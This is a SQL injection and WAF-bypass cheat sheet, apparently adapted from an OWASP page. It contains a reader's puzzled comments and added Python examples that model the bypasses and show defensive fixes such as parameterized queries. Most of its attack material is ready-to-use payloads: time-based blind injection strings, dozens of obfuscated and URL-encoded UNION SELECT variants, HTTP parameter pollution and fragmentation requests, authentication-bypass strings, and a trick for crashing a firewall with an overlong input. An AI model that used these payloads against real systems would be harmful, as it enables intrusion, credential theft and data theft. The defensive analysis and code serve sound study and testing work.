Contents

  • SQLI
  • SQL injection--Basic Concepts
  • Bypass with Comments
  • Case Changing
  • Replaced Keywords
  • Advanced Methods
  • Auth Bypass
  • Benchmark

SQLI

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

SQL injection–Basic Concepts

There are two types of SQL injection:

  1. SQL injection into a String/Char parameter
    Example: SELECT * from table where example = 'Example'
  2. SQL Injection into a Numeric parameter
    Example: SELECT * from table where id = 123

A vulnerable request can occur in Insert, Update, Delete statements, etc.
Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'

Blind SQL Injection
Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))

SLEEP(5)--
SELECT BENCHMARK(1000000,MD5('A'));
id=1 OR SLEEP(25)=0 LIMIT 1--
id=1) OR SLEEP(25)=0 LIMIT 1--
id=1' OR SLEEP(25)=0 LIMIT 1--
id=1') OR SLEEP(25)=0 LIMIT 1--
id=1)) OR SLEEP(25)=0 LIMIT 1--
id=SELECT SLEEP(25)--

Bypassing WAF: SQL Injection - Normalization Method

Example Number (1) of a vulnerability in the function of request normalization.

• The following request doesn't allow anyone to conduct an attack

/?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed

/?id=1/*union*/union/*select*/select+1,2,3/*

• After being processed by WAF, the request will become

index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*

The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source.

Example Number (2) of a vulnerability in the function of request normalization.

• Similarly, the following request doesn't allow anyone to conduct an attack

/?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed

/?id=1+un/**/ion+sel/**/ect+1,2,3--

• The SQL request will become

SELECT * from table where id =1 union select 1,2,3--

Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####, %00).


The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).

Using HTTP Parameter Pollution (HPP)
• The following request doesn’t allow anyone to conduct an attack

/?id=1;select+1,2,3+from+users+where+id=1--

• This request will be successfully performed using HPP

/?id=1;select+1&id=2,3+from+users+where+id=1--
I don't understand what is going on here.
Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked

Using HTTP Parameter Pollution (HPP)
• Vulnerable code

SQL=" select key from table where id= "+Request.QueryString("id")

• This request is successfully performed using the HPP technique

/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

• The SQL request becomes select key from table where

id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users

Bypassing WAF: SQL Injection – HPF
Using HTTP Parameter Fragmentation (HPF)
• Vulnerable code example

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

• The following request doesn’t allow anyone to conduct an attack

/?a=1+union+select+1,2/*

• These requests may be successfully performed using HPF

/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

• The SQL requests become

select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
I don't understand this either. What is the essence of HPF and WAF? Unclear.
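As an added example (not from this page or from OWASP), the following Python models the server side of the HPP and HPF requests above: how an environment that concatenates repeated `id` values produces the string the page shows, how the PHP concatenation in the HPF example splices `a` and `b` back into one statement, and a strict accessor that rejects a repeated parameter instead of guessing which value was meant. The request strings are the page's own; the comma join is modelled on the result the page shows, and `strict_single` and the other function names are this example's assumptions.

```python
from urllib.parse import parse_qs

# Constructed sample inputs: the query strings of the page's HPP and HPF
# requests with the leading "/?" removed.
HPP_QUERY = "id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users"
HPF_QUERY = "a=1+union/*&b=*/select+1,2"


def parse_params(query):
    """Decode a query string into name -> list of every value supplied.

    parse_qs keeps all values of a repeated name, so nothing is silently
    dropped before the duplicate check below.
    """
    return parse_qs(query, keep_blank_values=True)


def duplicated_names(params):
    """Names supplied more than once: the precondition for any HPP trick."""
    return sorted(name for name, values in params.items() if len(values) > 1)


def join_repeated(values, sep=","):
    """Model of an environment that concatenates repeated values.

    The page's ASP example shows Request.QueryString("id") yielding all
    values joined by a comma; other stacks keep only the first or only the
    last value, which is why the page says the outcome depends on the
    environment of the application.
    """
    return sep.join(values)


def hpp_joined(query=HPP_QUERY):
    """What the page's 'select key from table where id=' code receives."""
    return join_repeated(parse_params(query)["id"])


def hpf_query(query=HPF_QUERY):
    """Rebuild the page's PHP concatenation for the HPF example:
    "select * from table where a=".$_GET['a']." and b=".$_GET['b']
    '+' decodes to a space, so the comment opened in a is closed in b and
    the ' and b=' text the application inserted is swallowed by it.
    """
    params = parse_params(query)
    a = params["a"][0]
    b = params["b"][0]
    return "select * from table where a=" + a + " and b=" + b


def strict_single(params, name):
    """Defensive accessor (hypothetical helper): a parameter that is expected
    once is rejected when repeated, so the application never depends on the
    first/last/joined semantics of its framework."""
    values = params.get(name, [])
    if len(values) != 1:
        raise ValueError(
            f"parameter {name!r} supplied {len(values)} times, expected exactly once")
    return values[0]


def accepts(query, name="id"):
    """True when the request passes the strict single-value rule for `name`."""
    try:
        strict_single(parse_params(query), name)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print("repeated names:", duplicated_names(parse_params(HPP_QUERY)))
    print("HPP id seen by the app:", hpp_joined())
    print("HPF statement:", hpf_query())
    print("strict accessor:", accepts("id=1"), accepts(HPP_QUERY))
```

Running it reproduces the page's `id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users` and `select * from table where a=1 union/* and b=*/select 1,2` lines from the raw requests, which is the piece the page leaves implicit: the WAF inspects each parameter value in isolation, while the application glues them back together. Rejecting repeated names removes the HPP case entirely; HPF still needs the query to be parameterized rather than concatenated, since each fragment on its own looks harmless.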

Bypassing WAF: Blind SQL Injection
Using logical requests AND/OR
• The following requests allow one to conduct a successful attack for many WAFs
/?id=1+OR+0x50=0x50
/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Negation and inequality signs (!=, <>, <, >) can be used instead of the equality one – It is amazing, but many WAFs miss it!
It becomes possible to exploit the vulnerability with the method of blind SQL injection by replacing SQL functions that get to WAF signatures with their synonyms:

substring() -> mid(), substr()
ascii() -> hex(), bin()
benchmark() -> sleep()
Wide variety of logical requests.

and 1
or 1
and 1=1
and 2<3
and 'a'='a'
and 'a'<>'b'
and char(32)=' '
and 3<=2
and 5<=>4
and 5<=>5
and 5 is null
or 5 is not null
....

An example of various request notations with the same meaning.

select user from mysql.user where user = 'user' OR mid(password,1,1)='*'
select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a
select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a')
select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]'
select user from mysql.user where user = 'user' OR mid(password,1,1) like '*'
select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]'
select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1
select user from mysql.user where user = 'user' OR position(0x2a in password)=1
select user from mysql.user where user = 'user' OR locate(0x2a,password)=1

Known:

substring((select 'password'),1,1) = 0x70
substr((select 'password'),1,1) = 0x70
mid((select 'password'),1,1) = 0x70

New:

strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first argument is smaller than the second one, and 1 otherwise.

An example of signature bypass. The following request gets to a WAF signature:

/?id=1+union+(select+1,2+from+users)

But sometimes the signatures used can be bypassed:

/?id=1+union+(select+'xz'from+xxx)

/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)

An SQL injection attack can successfully bypass the WAF and be conducted in all of the following cases:
• Vulnerabilities in the functions of WAF request normalization.
• Application of HPP and HPF techniques.
• Bypassing filter rules (signatures).
• Vulnerability exploitation by the method of blind SQL Injection.
• Attacking the application operating logics (and/or)

WAF Bypassing Strings.

/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
concat(0x223e,@@version)
concat(0x273e27,version(),0x3c212d2d)
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
concat(0x223e,@@version,0x3c696d67207372633d22)
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
concat(0x223e3c62723e,@@version,0x3a,BlackRose",0x3c696d67207372633d22)
concat('',@@version,'')
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

Union Select by PASS with Url Encoded Method:

%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion
all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

Illegal mix of Collations ByPass Method :

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

Code: http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--

Case Changing

Some WAFs filter only lowercase SQL keywords.

Regex Filter: /union\sselect/g

http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

Replaced Keywords

Some applications and WAFs use preg_replace to remove all SQL keywords, so we can bypass them easily.

http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--

In some cases the SQL keyword is filtered out and replaced with whitespace, so we can use "%0b" to bypass.

http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--

For mod_rewrite, the comment "/**/" cannot be used to bypass, so we use "%0b" in place of "/**/".

Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed: http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html

I don't understand this part; perhaps I'm just not familiar with PHP.

Advanced Methods

Crash the firewall via buffer overflow.

  1. Buffer Overflow / Firewall Crash: Many firewalls are developed in C/C++ and we can crash them using a buffer overflow.
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....
You can test if the WAF can be crashed by typing:
page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4....
If you get a 500, you can exploit it using the buffer overflow method.
  2. Replace Characters with their HEX Values: We can replace some characters with their HEX (URL-encoded) values.
Example: http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4.... (which means "union select")
  3. Misc Exploitable Functions: Many firewalls try to offer more protection by adding prototype or strange functions (which, of course, we can exploit!).
Example: the firewall below replaces "*" (asterisks) with whitespace. What we can do is this: http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4... If the firewall removes the "*", the result will be: 15+union+select.... So, if you find such a silly function, you can exploit it in this way.
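The normalization examples (1) and (2), the "Bypass with Comments", "Case Changing" and "Replaced Keywords" sections, and items 2 and 3 above all exploit the same gap: the filter reads the request differently from the SQL lexer behind it. The Python below is an added example (not from this page or from OWASP) that runs the page's own payloads through the page's literal regex filter `/union\sselect/` and through a normalizer that percent-decodes to a fixpoint, keeps the body of MySQL `/*! ... */` executable comments, reads a plain comment both as "removed" and as "a separator", folds case and collapses whitespace before matching. It also shows why a single-pass keyword remover in the style of the `preg_replace` example turns `UNunionION` into `UNION` while a fixpoint remover leaves nothing behind. The sample inputs are the decoded `id` values of the page's requests; every function name and the signature regexes are this example's assumptions.

```python
import re
from urllib.parse import unquote

# The page's own regex filter (Case Changing section): lowercase, one whitespace.
NAIVE_SIGNATURE = re.compile(r"union\sselect")
# Signature applied after normalization: word-bounded keywords, optional
# modifier, any amount of whitespace between them.
SQL_SIGNATURE = re.compile(r"\bunion\b(?:\s+(?:all|distinct|distinctrow))?\s+select\b")
# MySQL executes the body of /*! ... */ (an optional version number follows the '!').
EXEC_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Keyword remover in the style of the page's preg_replace example.
KEYWORDS = re.compile(r"union|select", re.I)

# Constructed sample inputs: decoded id values of requests quoted on the page.
SAMPLES = {
    "plain":          "1 union select 1,2,3--",
    "comment_inside": "1/*union*/union/*select*/select 1,2,3/*",  # normalization example (1)
    "comment_split":  "1 un/**/ion sel/**/ect 1,2,3--",           # example (2) / Bypass with Comments
    "mixed_case":     "1 UnIoN/**/SeLecT/**/1,2,3--",             # Case Changing
    "nested_keyword": "1 UNunionION SEselectLECT 1,2,3--",        # Replaced Keywords
    "hex_encoded":    "1 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4",     # Advanced Methods item 2
    "asterisks":      "-15 uni*on sel*ect 1,2,3,4",               # Advanced Methods item 3
}


def url_decode_fully(s, limit=5):
    """Percent-decode until the string stops changing (bounded), so a
    %25-double-encoded keyword does not hide from the matcher."""
    for _ in range(limit):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize_variants(s):
    """Produce the readings a SQL lexer might give the input.

    Executable-comment bodies are kept; a plain comment is then read both as
    'removed' (un/**/ion -> union) and as 'a separator' (1/*x*/union -> 1 union);
    whitespace is collapsed and case folded. Matching on any reading is the
    conservative choice for a filter.
    """
    s = EXEC_COMMENT.sub(r"\1", url_decode_fully(s))
    variants = set()
    for replacement in ("", " "):
        t = PLAIN_COMMENT.sub(replacement, s)
        t = re.sub(r"\s+", " ", t)          # \s also covers \x0b and \x0c
        variants.add(t.lower().strip())
    return variants


def naive_blocked(s):
    """Verdict of the page's literal regex filter."""
    return bool(NAIVE_SIGNATURE.search(s))


def normalized_blocked(s):
    """Verdict after normalization."""
    return any(SQL_SIGNATURE.search(v) for v in normalize_variants(s))


def strip_keywords_once(s):
    """Single-pass removal, as the page's preg_replace example does."""
    return KEYWORDS.sub("", s)


def strip_keywords_fixpoint(s):
    """Repeat removal until nothing changes; the nested-keyword trick then
    leaves no keyword behind."""
    while True:
        t = KEYWORDS.sub("", s)
        if t == s:
            return t
        s = t


def remove_asterisks(s):
    """The 'silly function' from Advanced Methods item 3: drop every '*'."""
    return s.replace("*", "")


def audit(samples=SAMPLES):
    """Compare both filters over the samples; the extra rows show whether a
    sanitizer's cleaned output is itself a union-select."""
    rows = {name: (naive_blocked(p), normalized_blocked(p)) for name, p in samples.items()}
    rows["nested_keyword:once"] = normalized_blocked(strip_keywords_once(samples["nested_keyword"]))
    rows["nested_keyword:fixpoint"] = normalized_blocked(strip_keywords_fixpoint(samples["nested_keyword"]))
    rows["asterisks:cleaned"] = normalized_blocked(remove_asterisks(samples["asterisks"]))
    return rows


if __name__ == "__main__":
    for name, verdict in audit().items():
        print(f"{name:26} {verdict}")
```

The audit shows the literal regex catching only the plain payload, the normalizer catching the comment, case and encoding variants, and both sanitizers (single-pass keyword removal, asterisk removal) producing output that is a working `union select` even though their input was not. That is the page's own observation about cleaning versus blocking in code: a filter that rewrites the request must re-check its own output, and the application behind it should not rely on the filter at all.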

Auth Bypass

If we need to bypass some admin panels, we do that using or 1=1.

Code:
or 1-- -'
or 1 or '1"or 1 or"
SELECT * FROM login WHERE id=1 or 1-- -' or 1 or '1"or 1 or" AND username='' AND password=''

What does this sentence mean? Several SQL statements are mashed together here, which is not clear.
The "or 1-- -" part becomes active, makes the condition true and ignores the rest of the query. Now let's check a regular string:

SELECT * FROM login WHERE username=' or 1-- -' or 1 or '1"or 1 or" ' .....

The "or 1" part makes the query true, and the other parts are treated as comparison strings. The same holds with double quotes.

SELECT * FROM login WHERE username=" or 1-- -' or 1 or '1"or 1 or" "
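The page shows the bypass but not the fix. As an added example (not from this page or from OWASP), the Python below builds the page's login query first by string concatenation, exactly as the page's application does, and then as a parameterized statement, and runs both against an in-memory SQLite table with constructed rows. The username payload is the page's own `or 1-- -' or 1 or '1"or 1 or"`; the table contents, the placeholder passwords and the helper names are this example's assumptions. SQLite applies the same `'...'` literal and `--` comment rules that make the page's payload work, so the behaviour carries over from the page's MySQL setting.

```python
import sqlite3

# The page's Auth Bypass payload, entered as the username (constructed test input).
PAYLOAD = "or 1-- -' or 1 or '1\"or 1 or\""


def make_db():
    """In-memory table with constructed rows. The page's query compares a
    plaintext password column; that shape is kept only to mirror the page,
    production code compares a password hash instead."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO login (username, password) VALUES (?, ?)",
        [("admin", "admin-pass-placeholder"), ("t1", "t1-pass-placeholder")],
    )
    con.commit()
    return con


def build_concatenated(username, password):
    """The statement as the page's application builds it: user input spliced
    into the SQL text between single quotes."""
    return ("SELECT COUNT(*) FROM login WHERE username='" + username
            + "' AND password='" + password + "'")


def login_concatenated(con, username, password):
    """Vulnerable check. With PAYLOAD the text becomes
    ... WHERE username='or 1-- -' or 1 or '1"or 1 or"' AND password='...'
    The quote in the payload closes the literal, the bare 'or 1' makes the
    WHERE clause true for every row, and AND binds tighter than OR, so the
    password comparison no longer matters."""
    sql = build_concatenated(username, password)
    return con.execute(sql).fetchone()[0] > 0


def login_parameterized(con, username, password):
    """Hardened check: the same query with placeholders. The driver hands the
    values to SQLite separately from the SQL text, so quotes, 'or 1' and '--'
    inside them are compared as characters and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM login WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0


def demo():
    """Run both checks with the page's payload and with real credentials."""
    con = make_db()
    return {
        "concat_with_payload": login_concatenated(con, PAYLOAD, "x"),
        "param_with_payload": login_parameterized(con, PAYLOAD, "x"),
        "param_valid_user": login_parameterized(con, "t1", "t1-pass-placeholder"),
        "param_wrong_password": login_parameterized(con, "t1", "x"),
    }


if __name__ == "__main__":
    print(build_concatenated(PAYLOAD, "x"))
    for name, ok in demo().items():
        print(f"{name:22} login {'succeeds' if ok else 'fails'}")
```

The concatenated version logs the payload in with no valid account; the parameterized version rejects it and still accepts the real credentials. Since the payload never reaches the SQL parser as SQL, no WAF signature, case rule or keyword filter from the earlier sections is involved in the decision, which is why parameterization rather than filtering is the fix for every bypass string on this page.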

Benchmark

Please use the Benchmark, make your own SQLi strings and test your different test cases on it.

OWASP Benchmark Project

The OWASP Benchmark Project is a Java test suite designed to evaluate the accuracy, coverage, and speed of automated software vulnerability detection tools. Without the ability to measure these tools, it is difficult to understand their strengths and weaknesses, and compare them to each other.

OWASP Benchmark is a fully runnable open source web application that contains thousands of exploitable test cases, each mapped to specific CWEs, which can be analyzed by any type of Application Security Testing (AST) tool, including SAST, DAST (like OWASP ZAP), and IAST tools. The intent is that all the vulnerabilities deliberately included in and scored by the Benchmark are actually exploitable, so it's a fair test for any kind of application vulnerability detection tool. The Benchmark also includes dozens of scorecard generators for numerous open source and commercial AST tools, and the set of supported tools is growing all the time.

Reference:
https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF

SQL Injection Bypassing WAF ——from DVWA ——2012-12-8
